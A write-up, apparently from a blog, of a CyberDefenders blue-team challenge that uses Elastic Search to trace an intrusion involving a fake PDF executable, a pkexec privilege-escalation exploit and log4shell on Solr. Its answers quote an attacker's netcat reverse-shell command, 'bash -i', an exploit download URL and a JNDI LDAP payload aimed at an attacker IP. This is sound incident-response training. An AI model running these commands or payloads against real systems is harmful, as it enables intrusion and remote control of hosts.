Malware logo

Intro

CyberDefenders.org, hosted a challenging hawkeye stealer challenge. You the challenger/IR team have to investigate an incident using ELastic Search, and answer questions about the infected victim and the attack narative.

For those that don’t know about CyberDefenders they host a platform deticated to training BlueTeam skills: Incident response, digital forensics, security analysts, etc). If you are used to VulnHub and Hack-the-box, these services are typically geared more towards redteaming and penetration testing. This is where CyberDefenders stand out!

Walkthrough

1) Who downloads the malicious file which has a double extension?

  • search: file.name:..* and rule.name:Downloads
ahmed

2) What is the hostname he was using?

Answer:

DESKTOP-Q1SL9P2

3) What is the name of the malicious file?

Answer:

 Acount_details.pdf.exe

4) What is the attacker’s IP address?

Hint:

  • time: feb 2 15:30+
  • search: related.user:ahmed
  • filter: destination.ip:exists

Answer:

192.168.1.10

5) Another user with high privilege runs the same malicious file. What is the username?

  • remove related.user from previous search

Answer:

cybery

6) The attacker was able to upload a DLL file of size 8704. What is the file name?

  • search: related.user:cybery and event.type:”creation”

Answer:

mCblHDgWP.dll

7) What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?

  • search: process.pid :10716
  • log: winlogbeat

Answer:

rundll32.exe

8) The previous process was able to access a registry. What is the full path of the registry

Hint:

  • log: logs-*
  • search: process.name:”rundll32.exe”
  • time: feb 2 15:00+

Answer:

HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled

9) PowerShell process with pid 8836 changed a file in the system. What was that filename?

  • search: event.type:”change” and process.name:powershell.exe
  • log: logs-*

Answer:

ModuleAnalysisCache

10) PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?

  • search: event.type:”creation” and process.name:powershell.exe and process.pid: 11676
  • log: log-*

Answer:

__PSScriptPolicyTest_bymwxuft.3b5.ps1

11) What is the machine’s IP address that is in the same LAN as a windows machine?

This one threw up sharding issues for me???

Eventually looking around the time of the attack, and the address rangfe 192.168.10.1/24, we found out answer…

Answer:

192.168.10.30

12) The attacker login to the Ubuntu machine after a brute force attack. What is the username he was successfully login with?

  • search: event.action:”ssh_login”
  • log: logs-*
  • time: feb 2 15:30+

Answer:

salem

13) After that attacker downloaded the exploit from the GitHub repo using wget. What is the full URL of the repo?

  • search: user.name:”salem” and wget
  • log: logs-*

Answer:

https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py

14) After The attacker runs the exploit, which spawns a new process called pkexec, what is the process’s md5 hash?

tricky one, but if we search on the pids 3003/3004 from previous answer…

  • search: process.name:”pkexec” and process.pid:3003
  • log: logs-*

Answer:

3a4ad518e9e404a6bad3d39dfebaf2f6

15) Then attacker gets an interactive shell by running a specific command on the process id 3011 with the root user. What is the command?

Answer:

bash -i

16) What is the hostname which alert signal.rule.name: “Netcat Network Activity”?

Hint:

  • switch to Security -> Rules

Answer:

CentOS

17) What is the username who ran netcat?

Answer:

solr

18) What is the parent process name of netcat?

Answer:

java

19) If you focus on nc process, you can get the entire command that the attacker ran to get a reverse shell. Write the full command?

Answer:

nc -e /bin/bash 192.168.1.10 9999

20) From the previous three questions, you may remember a famous java vulnerability. What is it?

Answer:

log4shell

21) What is the entire log file path of the “solr” application?

Hint:

  • log: logs-*
  • search: file.name:solr*

Answer:

/var/solr/logs/solr.log

22) What is the path that is vulnerable to log4j?

Hint:

  • log: filebeat
  • search: log.file.path:”/var/solr/logs/solr.log”

Answer:

/admin/cores

23) What is the GET request parameter used to deliver log4j payload?

Answer:

foo

24) What is the JNDI payload that is connected to the LDAP port?

Answer:

 {foo=${jndi:ldap://192.168.1.10:1389/Exploit}}
Share on: